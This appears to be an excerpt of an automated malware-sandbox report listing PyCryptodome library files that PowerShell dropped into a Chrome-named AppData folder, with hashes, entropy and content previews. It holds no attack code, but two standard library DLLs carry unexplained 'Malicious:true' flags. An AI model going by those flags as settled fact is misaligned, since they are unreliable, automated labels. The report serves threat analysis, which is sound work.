                                                                                                                                                                                                  SSDEEP:3:1L67L3VFGJeQACyoOXZohvvn:1LymJlAPmNv
                                                                                                                                                                                                  MD5:1B3750794FA1C99B19798392A644DD26
                                                                                                                                                                                                  SHA1:1449A147E2608AE5A6C9AFD5090E62992B39CAF7
                                                                                                                                                                                                  SHA-256:32D4D0B0B2FD179F5DFD1A04C22A2D3FD4D178D5C7645ECF15754FC073C7E508
                                                                                                                                                                                                  SHA-512:1ABCA6FB4ED46759D6BA04AB76F302AB9E3C14813F319295AAFAE68C91CFB3E197894916D8C9D464B35D5E14741E159CAC64166F30A0A05FF5BC9A3158D783FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from ._IntegerBase import IntegerBase..class IntegerGMP(IntegerBase):.. pass..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Math\_IntegerNative.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11706
                                                                                                                                                                                                  Entropy (8bit):4.6054682088352425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/ICZ7QVq4iMJK1efS4ohX2EGupgYL1kX38q6Rp:0rskrs9VqJ4iMK1efamipgYL1kX38qe
                                                                                                                                                                                                  MD5:B1274BA41A935E6006C7CCB1A81ED57E
                                                                                                                                                                                                  SHA1:F025D6E5885E29EE4D246C7BE4E572A86874C37B
                                                                                                                                                                                                  SHA-256:2EE1971FAF400609AC9F569BC9F435FF18F0DFC2ECECE7BC7F45DD4183A04CFF
                                                                                                                                                                                                  SHA-512:C9CAA76F6C2AF4F5C4CB4C7DF57DEDE96ED07BECC44503FB67BDA27CA30EAA77EC5C143732FC3CDEA266228F22E7B14DC9582B31FFB71C84EE4E01BFD66F4A96
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Math\_IntegerNative.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):84
                                                                                                                                                                                                  Entropy (8bit):4.2558290658438995
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:1L67L3VFGJeQACyPLRAXZohvvn:1LymJlATLKmNv
                                                                                                                                                                                                  MD5:5629E6B58552EE91D828CFF9CA49219A
                                                                                                                                                                                                  SHA1:CDB1DCA0B7E2E94F5393A861422C1C38D4472763
                                                                                                                                                                                                  SHA-256:CA1DD04ECAC1474B1FBDAD15AB86881FB10E182A32C3AEB88C3F9F1B468E62E7
                                                                                                                                                                                                  SHA-512:074FE60CAE14932319C5C6174D10F7E77594AAA40FAE192D8B16098C867C010A756193163DA74EEA235FF46781A8FE68C257A5AB456D6F063A4A261813D352E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from ._IntegerBase import IntegerBase..class IntegerNative(IntegerBase):.. pass..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Math\_modexp.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32256
                                                                                                                                                                                                  Entropy (8bit):6.222169874586115
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:nGyDeWs5BywFLl4OwhjU7/QnHO0VjNECtu9nBI+:nUBPd7oH5/Ftu9m+
                                                                                                                                                                                                  MD5:8C6F920D10A6E8350E269DD2E3E7062C
                                                                                                                                                                                                  SHA1:00AC132AF7896696337DF65BA95686883169FE54
                                                                                                                                                                                                  SHA-256:8A6FF91276C58BF8F524DD2419AEB9C218B3E369C27113A264DC412F08A89650
                                                                                                                                                                                                  SHA-512:8DAC845BAB134B7169D4134891884D9CD5DD431C24DA8DDE98D89EF6D858DF775C3D770CB3CDBEBC410BF2C16A87CA75D52AAC7DAE18CFB7D557E2771EFC5A0A
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........em...>...>...>...>...>...?...>...?...>...>...>...?...>...?...>...?...>...?...>...?...>...>...>...?...>Rich...>........................PE..L...<..e...........!...%.`..........T........p............................................@..........................u..|...|u..d....................................q...............................p..@............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data...p............n..............@....rsrc................x..............@..@.reloc...............z..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\DH.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3274
                                                                                                                                                                                                  Entropy (8bit):4.693836120739867
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gY+1BttCqDO2HfgdO3dSXWxAzPB0d8vHWHN6xCvsrWjWO7K1T+vEZq9KsDsD/:ZKBttCqDO2/1AzpatLjST+vt9+/
                                                                                                                                                                                                  MD5:05BAB8AC5A99E7F1E3A930AD0241310A
                                                                                                                                                                                                  SHA1:1C86AE14E272E56C5F7F9B674222AC5C72E5FAA1
                                                                                                                                                                                                  SHA-256:1FBA768D59659EAE57CFBF6E2DD703365744B49FE47BB8EEE11A80A129597735
                                                                                                                                                                                                  SHA-512:FBE7D4C991EFAB21EA6D2E6B1FB98B014C2F823003BF65957B81587B6C19C01FBE2527232EC8B23AE59057A966D1103E6B193CD86CE9CB2E479D5861FFEC9D43
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from Crypto.Util.number import long_to_bytes..from Crypto.PublicKey.ECC import EccKey......def _compute_ecdh(key_priv, key_pub):.. # See Section 5.7.1.2 in NIST SP 800-56Ar3.. pointP = key_pub.pointQ * key_priv.d.. if pointP.is_point_at_infinity():.. raise ValueError("Invalid ECDH point").. z = long_to_bytes(pointP.x, pointP.size_in_bytes()).. return z......def key_agreement(**kwargs):.. """Perform a Diffie-Hellman key agreement..... Keywords:.. kdf (callable):.. A key derivation function that accepts ``bytes`` as input and returns.. ``bytes``... static_priv (EccKey):.. The local static private key. Optional... static_pub (EccKey):.. The static public key that belongs to the peer. Optional... eph_priv (EccKey):.. The local ephemeral private key, generated for this session. Optional... eph_pub (EccKey):.. The ephemeral public key, received from the peer for this session. Optional..... At le

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\DH.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):482
                                                                                                                                                                                                  Entropy (8bit):5.105314197006538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYB9mNRE1BgS+1dwCw+cKl1J/5NcpN9NVSyoGyv:1REuyC1R+169gvC/gyfyv
                                                                                                                                                                                                  MD5:69A7EFD78AFDEF04820558CECC146AE6
                                                                                                                                                                                                  SHA1:3CF02E290E2C748FEB0AA29B55FB9C8BE7421E81
                                                                                                                                                                                                  SHA-256:FC079D87295B952D7A52929D205ED7BBED1EE2741479E96337FA7EBC9428A26A
                                                                                                                                                                                                  SHA-512:8F1CD56424FC12C86AA16ED0DBC076E2D0FA7714CE93F4D9B1C109BB661285563E4AA2918C48A2DC076B945ED2207197F53683946E29C78F1B9F32E668E54F03
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import TypedDict, Callable, TypeVar, Generic..from typing_extensions import Unpack, NotRequired....from Crypto.PublicKey.ECC import EccKey....T = TypeVar('T')....class RequestParams(TypedDict, Generic[T]):.. kdf: Callable[[bytes|bytearray|memoryview], T].. static_priv: NotRequired[EccKey].. static_pub: NotRequired[EccKey].. eph_priv: NotRequired[EccKey].. eph_pub: NotRequired[EccKey]....def key_agreement(**kwargs: Unpack[RequestParams[T]]) -> T: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\KDF.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22955
                                                                                                                                                                                                  Entropy (8bit):4.822109096386609
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:We0Nt96AroMwVVlrV4ENoDZtzQNzRS1zyid3KKKXVvEtUa:9wt5kV4QoDZAzRCnKlm
                                                                                                                                                                                                  MD5:78EA2251CC2560710EFF6D782F1C705E
                                                                                                                                                                                                  SHA1:92A4E050AE5883220F461FC01ED7C0CA1ED4DF16
                                                                                                                                                                                                  SHA-256:F47D981850B12CD0ECE583D13EF5F29F0BF72D60A2D089C3FC093F02EA5D1746
                                                                                                                                                                                                  SHA-512:E52616C1DFB149357FBD8B59D0E0CF392362A03065DC232354D1061DA393F5E30C030A950998A99AD606698E2AA4A769F9D9FD6A3A09281736B1168E5A023329
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# coding=utf-8..#..# KDF.py : a collection of Key Derivation Functions..#..# Part of the Python Cryptography Toolkit..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\KDF.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2038
                                                                                                                                                                                                  Entropy (8bit):4.91503915615325
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ccWF4ZIA4B0Aq3myAjhANxt9z5RJx6Rgmqd:ccWFgR42Aq3myANAPz5RJURgmQ
                                                                                                                                                                                                  MD5:1687A469EDFFF0FFDAA2B11B36773D3E
                                                                                                                                                                                                  SHA1:33C8FB6F81ACDB5D4269C3B71B4357A75D3717DA
                                                                                                                                                                                                  SHA-256:B131B886A651ED555E85ED9776332A77826C1EECF002D077573CCB3B6E410F8D
                                                                                                                                                                                                  SHA-512:40EB0A8B520F945357B26CFD09DB469AD54CA21DB0E322D4932DF12570EB23D80920C4B9BC017DDDC241A3FC1F9BA5E41607629ECEB09C59F39B8BCFBCF4D0CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....RNG = Callable[[int], bytes]..PRF = Callable[[bytes, bytes], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) ->

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\SecretSharing.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9056
                                                                                                                                                                                                  Entropy (8bit):4.7874787545071635
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:oqrskrs9t3q/IG1RYr24zEqG5TFiW4m1DH/T:Xrskrs9VqPaQqSTFiWV7
                                                                                                                                                                                                  MD5:8F0F67CEDF28EC2C022DC31587D03BB5
                                                                                                                                                                                                  SHA1:86EC75E3ACBF09488E0592A026F40FF26A27BBF5
                                                                                                                                                                                                  SHA-256:4DB85B5FF214482B6A912C0E90E73F8164B54AC4CC69390DE67024A4B6FD164D
                                                                                                                                                                                                  SHA-512:B6EC5234AF9CC7C513D7FD95BD1638177B0778FA65E19813319B7951B3846F3F83BADC4CFD85FA465CB98886CA73F206228FA336F0F62FFA8E23E455A1BC5BE0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SecretSharing.py : distribute a secret amongst a group of participants..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\SecretSharing.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):820
                                                                                                                                                                                                  Entropy (8bit):4.725635475246741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
                                                                                                                                                                                                  MD5:2C29B85AA1A7948F90DCFD8358D8E6B4
                                                                                                                                                                                                  SHA1:A3915B73FF0D5551F611428FEDB436617E35B93F
                                                                                                                                                                                                  SHA-256:17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
                                                                                                                                                                                                  SHA-512:665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1585
                                                                                                                                                                                                  Entropy (8bit):5.205262016568805
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHm:MwDqrYJALrYJHdt3EHGuIG
                                                                                                                                                                                                  MD5:359E5E3040820102CF68398BFCEF8840
                                                                                                                                                                                                  SHA1:893ABCEC60366D62B13FC6679599EFFFBEFF1450
                                                                                                                                                                                                  SHA-256:5E519AC6FBC45FDC85A460E0DDAD070BAF48BC16C1BA2906A67168F89E3F0899
                                                                                                                                                                                                  SHA-512:953D5D7B66792121BFE24C805B33704E9B2491EB956BAB0F82497455E3CD1388E7DD134685D56E38E6D10D5B45894FA2D9DEBFCAFD53E21D5A600892A11A63BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\__init__.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):44
                                                                                                                                                                                                  Entropy (8bit):4.516027641266231
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
                                                                                                                                                                                                  MD5:4200283AFF0E859DE9F1C15EBAD7A073
                                                                                                                                                                                                  SHA1:42B5DC005A804C92E877D93FB14FDB41E52C6C7A
                                                                                                                                                                                                  SHA-256:D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
                                                                                                                                                                                                  SHA-512:A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:__all__ = ['KDF.pyi', 'SecretSharing.pyi']..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Protocol\_scrypt.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                  Entropy (8bit):5.135904494493939
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:oY6GI5NPEtoTB8zRWcNWJjRjOlSszZ0Ewh4MVnrGeN:wvJTB8fYJNjsDwhznrGU
                                                                                                                                                                                                  MD5:05969A7400A260E57F2DAD65544867A4
                                                                                                                                                                                                  SHA1:4AE65E8F97D7AB71C5729555C3C92CEA1AF969EC
                                                                                                                                                                                                  SHA-256:427C831901265053C4F7AE53B7B60078A0A70381D6EA050ED0944556C396EAE8
                                                                                                                                                                                                  SHA-512:9984DBA0DEFC3EF23AB5FDD0B311ECEA6EAA0BA07D8CD9A2CBF6FC7F47D8764110B8A9A2C4F05FE1BEDDBD54F604E2F7A659C73F38767C5B3894298E2E98022B
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L...9..e...........!...%............N........0...............................p............@..........................5..d...d5..d....P.......................`..X...x1...............................0..@............0..|............................text...[........................... ..`.rdata.......0......................@..@.data........@....... ..............@....rsrc........P......."..............@..@.reloc..X....`.......$..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\DSA.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23060
                                                                                                                                                                                                  Entropy (8bit):4.8542965681461245
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zUe8B4XpyRj8fJ8RbvNWrJVs2okSpSuR4rmSISAX:zH8Qkj8foQrvA4rmSrAX
                                                                                                                                                                                                  MD5:7F4C4E4A51254CF7C23BAD8DF3940A4B
                                                                                                                                                                                                  SHA1:19497A8225DD25DA5379CBB343581383D886B97A
                                                                                                                                                                                                  SHA-256:479862D6D569DDFF438312AF51E1757D6A748ABF932507A3C08564F33DFF6BD5
                                                                                                                                                                                                  SHA-512:62B6196FCB08A837644697519755F2C01C77A386E5083D5CA79303E2EC33A8525A45A7C589B83F95B553F0EE7F82860F9EB108CF070F6DC45615777DF6370F33
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# PublicKey/DSA.py : DSA signature primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\DSA.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1412
                                                                                                                                                                                                  Entropy (8bit):4.9317569017679235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RECbuLosANpNAEGjm53s+MAHUpSm+CHZJHPaHzy3:ryEsuj5Gjm2+NHUpGuJiTy3
                                                                                                                                                                                                  MD5:299FE26EFF86811A83759B29485B17D7
                                                                                                                                                                                                  SHA1:308EF3564AB7D637AA3F00747618AB8D625B09F4
                                                                                                                                                                                                  SHA-256:7E2D92CC91313869FFB9ACBDE0F4628F6BB9995FF154BCC0E8C2F1F733E96C4F
                                                                                                                                                                                                  SHA-512:785B0A5D31BC45D4FE2580B26F09A45EFB9FB6244115AB973F4BE65D98A63A49504330553B758672638529082DA1809A541F9AD5EFDF774AA51F9DD2F8A301AF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Dict, Tuple, Callable, Union, Optional....__all__ = ['generate', 'construct', 'DsaKey', 'import_key' ]....RNG = Callable[[int], bytes]....class DsaKey(object):.. def __init__(self, key_dict: Dict[str, int]) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool: ... # legacy.. def public_key(self) -> DsaKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: ..... def domain(self) -> Tuple[int, int, int]: ..... def __repr__(self) -> str: ..... def __getattr__(self, item: str) -> int: ..... def export_key(self, format: Optional[str]="PEM", pkcs8: Optional[bool]=None, passphrase: Optional[str]=None,.. protection: Optional[str]=None, randfunc: Optional[RNG]=None) -> bytes: ..... # Backward-compatibility.. exportKey = export_key.. publickey = public_key....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\PublicKey\ECC.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):67427
                                                                                                                                                                                                  Entropy (8bit):4.857152735652469
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:HrpnnHM/SBQx60ma/iVVffcIsutOPT/Tl/fokmC1DuYKG:HrdW6gYffcnjBXYI1
                                                                                                                                                                                                  MD5:725F8EC9C104AA3C6B0950278B06BC42
                                                                                                                                                                                                  SHA1:86691C9548643EEC3FCF405B9795EF5A11FDDE8A
                                                                                                                                                                                                  SHA-256:F17C068FD0BC1DCA2CC84366CF2CCB5CECF89DCB460EA7BE6C3BF64387AB9FB7
                                                                                                                                                                                                  SHA-512:D9CF278693EAC5866F7AD7B8223F95608BEB1CE255DA6FC31152DA2980B8DC82432FAFF2B2879F094489E53ABE5422F8FA3097AB3277A708698455991E42A421
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

